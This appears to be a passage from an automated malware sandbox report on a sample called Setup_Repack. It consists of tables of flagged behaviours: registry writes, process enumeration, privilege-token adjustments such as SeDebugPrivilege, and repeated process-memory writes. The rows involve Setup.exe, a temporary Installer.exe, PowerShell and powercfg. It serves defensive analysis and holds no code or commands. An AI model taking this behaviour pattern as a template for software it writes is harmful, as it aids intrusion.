Set value (str) \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "40C" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A

NTFS ADS

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TempState\Downloads\Setup_Repack.zip.t2sbfdg.partial:Zone.Identifier C:\Windows\system32\browser_broker.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\Desktop\Setup_Repack\Setup_Repack\Setup.exe N/A
N/A N/A C:\Users\Admin\Desktop\Setup_Repack\Setup_Repack\Setup.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\Installer.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\Installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\Installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\Installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\Installer.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zG.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\Setup_Repack\Setup_Repack\Setup.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\Installer.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\powercfg.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zG.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4340 wrote to memory of 1396 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 1396 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 1396 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 1396 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 1396 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 1396 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 1396 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 1396 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 1396 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 1396 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 1396 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 1396 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 1396 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 1396 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 1396 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 1396 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 1396 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 1396 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 1396 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 1396 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 1396 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 1396 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 1396 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 2024 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 2024 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 2024 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 2024 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 2024 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 2024 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 2024 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 2024 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 2024 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 2024 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 2024 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 2024 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 2024 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 2024 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 2024 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 752 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 752 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
